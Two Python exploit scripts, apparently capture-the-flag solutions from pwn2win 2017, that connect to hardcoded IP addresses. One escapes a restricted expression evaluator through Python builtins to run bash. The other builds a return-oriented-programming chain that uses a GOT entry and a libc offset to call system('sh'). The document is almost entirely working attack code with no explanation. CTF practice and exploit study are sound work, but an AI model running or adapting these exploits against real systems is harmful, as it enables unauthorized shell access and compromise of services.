pwn2win 2017 exps

tokens_v2.py

#!/usr/bin/env python
# coding=utf8

from pwn import remote

p = remote('200.136.213.114', '4000')
p.sendline('\D')
p.sendline('Revoke')
p.sendline('O\tpen')
p.sendline('gen eval(Option())')
p.sendline("re.__builtins__['__import__']('posix').system('bash')")
p.clean(timeout=2)
p.interactive()

warehouse.py

#!/usr/bin/env python
# coding=utf8

from pwn import u32, p32, remote
from roputils import ROP

rop = ROP('./warehouse')
libc = ROP('./libc.so.6')
p = remote('200.136.213.83', 8888)


def sendlist(*args):
    for arg in args:
        p.sendline(str(arg))


def sendbuf(base, buf):
    for i in range(len(buf)/4):
        sendlist(base + i, u32(buf[i*4:i*4+4]))


# gadgets
pop_eax_ret = 0x08048539
pop_ebx_ret = 0x0804837d
add_eax_ebx_ret = 0x08048537  # *lucky*
call_eax = 0x08048463
atol_got = 0x8049910
store_func = 0x80484FB

# safe WA memory address in .dynamic
safe_to_write = 0x80498bc

system_off_to_atol = libc.addr('system') - libc.addr('atol')

# store_func
# pop
# pop
# pop
# ret
payload = rop.call(store_func, safe_to_write, 0, u32('sh'.ljust(4, '\x00')))

# pop eax; ret
# pop ebx; ret
# add eax, dword ptr [eax + ebx*2] ; ret
# call eax
payload += p32(pop_eax_ret) + p32(system_off_to_atol) + \
    p32(pop_ebx_ret) + p32((atol_got - system_off_to_atol) / 2) + \
    p32(add_eax_ebx_ret) + \
    p32(call_eax) + p32(safe_to_write)

sendbuf(72, payload)
p.sendline('.')

p.clean(timeout=0.5)
p.interactive()